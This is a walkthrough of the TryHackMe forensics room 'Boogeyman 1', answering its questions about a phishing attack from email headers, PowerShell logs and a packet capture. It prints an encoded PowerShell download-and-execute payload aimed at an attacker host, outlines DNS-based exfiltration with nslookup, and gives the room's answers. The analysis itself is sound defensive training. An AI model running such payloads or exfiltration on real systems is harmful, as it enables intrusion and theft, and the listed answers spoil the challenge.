¶ Boogeyman 1
Date: 2025-08-10
Difficulty:Unknown|Easy| Medium |Hard
Reference: https://tryhackme.com/room/boogeyman1
¶ Introduction - New threat in town
Uncover the secrets of the new emerging threat, the Boogeyman.
In this room, you will be tasked to analyse the Tactics, Techniques, and Procedures (TTPs) executed by a threat group, from obtaining initial access until achieving its objective.
Investigation Platform
Before we proceed, deploy the attached machine by clicking the Start Machine button in the upper-right-hand corner of the task. It may take up to 3-5 minutes to initialise the services.
The machine will start in a split-screen view. In case the VM is not visible, use the blue Show Split View button at the top-right of the page.
¶ Artefacts
For the investigation proper, you will be provided with the following artefacts:
- Copy of the phishing email (dump.eml)
- Powershell Logs from Julianne's workstation (powershell.json)
- Packet capture from the same workstation (capture.pcapng)
Note: The powershell.json file contains JSON-formatted PowerShell logs extracted from its original evtx file via the evtx2json tool.
You may find these files in the /home/ubuntu/Desktop/artefacts directory.
¶ Tools
The provided VM contains the following tools at your disposal:
- Thunderbird - a free and open-source cross-platform email client.
- LNKParse3 - a python package for forensics of a binary file with LNK extension.
- Wireshark - GUI-based packet analyser.
- Tshark - CLI-based Wireshark.
- jq - a lightweight and flexible command-line JSON processor.
To effectively parse and analyse the provided artefacts, you may also utilise built-in command-line tools such as:
- grep
- sed
- awk
- base64
Now, let's start hunting the Boogeyman!
¶ 1. Email Analysis - Look at the headers!
Julianne, a finance employee working for Quick Logistics LLC, received a follow-up email regarding an unpaid invoice from their business partner, B Packaging Inc. Unbeknownst to her, the attached document was malicious and compromised her workstation.
The security team was able to flag the suspicious execution of the attachment, in addition to the phishing reports received from the other finance department employees, making it seem to be a targeted attack on the finance team. Upon checking the latest trends, the initial TTP used for the malicious attachment is attributed to the new threat group named Boogeyman, known for targeting the logistics sector.
You are tasked to analyse and assess the impact of the compromise.
¶ 1.1 What is the email address used to send the phishing email?
I used cat and grep to extract the sending email address:
agriffin@bpakcaging.xyz
¶ 1.2 What is the email address of the victim?
Same approach as the question before:
julianne.westcott@hotmail.com
¶ 1.3 What is the name of the third-party mail relay service used by the attacker based on the DKIM-Signature and List-Unsubscribe headers?
The information is written in the header of the mail. I read the mail with cat and used head -n 50 to get the first 50 lines of the mail. I found the DKIM-Signature of the third-party mail relay service:
elasticemail
¶ 1.4 What is the name of the file inside the encrypted attachment?
To get the attachment of the mail I finally opened the mail in Thunderbird and downloaded the zip-file. Then I opened it (and I presume that I'm working on a secure, sandboxed environment) and saw the name of the file that is inside the archive:
Invoice_20230103.lnk
¶ 1.5 What is the password of the encrypted attachment?
The password was plain in the email:
Invoice2023!
¶ 1.6 Based on the result of the lnkparse tool, what is the encoded payload found in the Command Line Arguments field?
I unzipped the archive and used lnkparse Invoice_20230103.lnk to parse the content of this lnk. There I found the encoded string:
aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZgBpAGwAZQBzAC4AYgBwAGEAawBjAGEAZwBpAG4AZwAuAHgAeQB6AC8AdQBwAGQAYQB0AGUAJwApAA==
¶ 2. Endpoint Security - Are you sure that's an invoice?
Based on the initial findings, we discovered how the malicious attachment compromised Julianne's workstation:
- A PowerShell command was executed.
- Decoding the payload reveals the starting point of endpoint activities.
Investigation Guide
With the following discoveries, we should now proceed with analysing the PowerShell logs to uncover the potential impact of the attack:
- Using the previous findings, we can start our analysis by searching the execution of the initial payload in the PowerShell logs.
- Since the given data is JSON, we can parse it in CLI using the jq command.
- Note that some logs are redundant and do not contain any critical information; hence can be ignored.
JQ Cheatsheet
jq is a lightweight and flexible command-line JSON processor. This tool can be used in conjunction with other text-processing commands.
You may use the following table as a guide in parsing the logs in this task.
¶ 2.1 What are the domains used by the attacker for file hosting and C2? Provide the domains in alphabetical order. (e.g. a.domain.com,b.domain.com)
I never worked with the jq tool before so I had to do some try and errors. I got familiar with it first by getting all the fields thats in there. After some failed tries I successfully used cat powershell.json | jq keys[] | sort | uniq to get all the keys that are available:
I found out that the ScriptBlockText field provides the executed commands. I used the following command to get all the information:
cat powershell.json | jq -s -c 'sort_by(.Timestamp) | .[]'| jq '{ScriptBlockText}'| sort | uniq
cdn.bpakcaging.xyz,files.bpakcaging.xyz
¶ 2.2 What is the name of the enumeration tool downloaded by the attacker?
Using the same command as last question, I received the answer:
seatbelt
¶ 2.3 What is the file accessed by the attacker using the downloaded sq3.exe binary? Provide the full file path with escaped backslashes.
C:\Users\j.westcott\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
¶ 2.4 What is the software that uses the file in Q3?
The directory was ...\Microsoft.MicrosoftStickyNotes[...] so the software is Microsoft Sticky Notes.
Microsoft Sticky Notes
¶ 2.5 What is the name of the exfiltrated file?
In the following screenshot you can see that the file protected_data.kdbx was the exfiltrated file:
protected_data.kdbx
¶ 2.6 What type of file uses the .kdbx file extension?
I use this software myself so I already knew the answer. But a quick research can be done as well.
keepass
¶ 2.7 What is the encoding used during the exfiltration attempt of the sensitive file?
hex
¶ 2.8 What is the tool used for exfiltration?
In the log you can see that the attacker uses nslookup (so DNS) to his C2 server and is sending A Record requests with the data of the exfiltrated file in chunks:
nslookup
¶ 3. Network Traffic Analysis - They got us. Call the bank immediately!
Based on the PowerShell logs investigation, we have seen the full impact of the attack:
- The threat actor was able to read and exfiltrate two potentially sensitive files.
- The domains and ports used for the network activity were discovered, including the tool used by the threat actor for exfiltration.
Investigation Guide
Finally, we can complete the investigation by understanding the network traffic caused by the attack:
- Utilise the domains and ports discovered from the previous task.
- All commands executed by the attacker and all command outputs were logged and stored in the packet capture.
- Follow the streams of the notable commands discovered from PowerShell logs.
- Based on the PowerShell logs, we can retrieve the contents of the exfiltrated data by understanding how it was encoded and extracted.
¶ 3.1 What software is used by the attacker to host its presumed file/payload server?
I opened the capture.pcapng file in wireshark and started to analyze it.
From the previous question I know that the attacker downloaded sq3.exe from his C2 server. I used the following filter to get the information I need:
I followed the http stream of the filtered package and got the answer:
Python
¶ 3.2 What is the protocol used during the exfiltration activity?
By filtering the http traffic by the C2 domains (bpakcaging.xyz) we can see POST requests thats been send via appilcation/x-www-form-urlencoded (and also in the previous questions of task 2 we saw that the attacker used POST requests):
POST
¶ 3.3 What is the protocol used during the exfiltration activity?
I can answer this question also based on the last task. I found out that the tool nslookup was used for exfiltration and this is sending DNS requests (to the attackers DNS server).
DNS
¶ 3.4 What is the password of the exfiltrated file?
I used the hint of THM:
So I filtered for http request that contains sq3.exe. I checked all the results and in the last one was the SQL statement "SELECT * from NOTE limit 100" (I saw the command in the previous task before as well). I followed the TCP stream and saw it was the stream 749. I checked the next TCP stream to see the response of the server:
This encoded message has to be decoded. For the decoding I used CyberChef. Since there are just numbers, no letters (like a-f for hex) I tried the decoding "From Decimal" and got the result and also the password:
%p9^3!lL^Mz47E2GaT^y
¶ 3.5 What is the credit card number stored inside the exfiltrated file?
I know the following:
- the password of the keepass file
- the C2 server dns (cdn.bpakcaging.xqz)
- DNS A requests were used for the exfiltration
- the data was send in chunks and hex encoded
Now I have to extract the A-record DNS requests to the C2 server. THM hint recommended using tshark for the exfiltration. To be honest this took me a while and I used some research how to do it and how to exfiltrate the data of the dns requests. This is the command I used:
tshark -r capture.pcapng -Y "dns" -T fields -e dns.qry.name | grep bpakcaging.xyz | cut -f1 -d "." | grep -v -e "cdn" -e "files" | uniq | tr -d "\n" > kdbx.txt
| Operation | Description |
|---|---|
tshark -r capture.pcapng |
Read the pcapng file. |
-Y "dns" |
Apply a display filter for DNS. |
-T fields |
Output only the specified display filter fields (here: DNS queries). |
grep bpakcaging.xyz |
Filter only entries for the C2 server domain. |
cut -f1 -d "." |
Extract only the first part (subdomain), as it contains the payload, by splitting the results at the . delimiter. |
grep -v -e "cdn" -e "files" |
Exclude any results containing cdn or files (-v inverts the match). |
uniq |
Remove duplicate lines. |
tr -d "\\n" |
Remove newline characters. |
> kdbx.txt |
Save the output to the file kdbx.txt. |
I decoded the hex encoded data with CyberChef and saved the filed on my computer. Then I opened the file with keepass, used the password of the previous question and got the result:
4024007128269551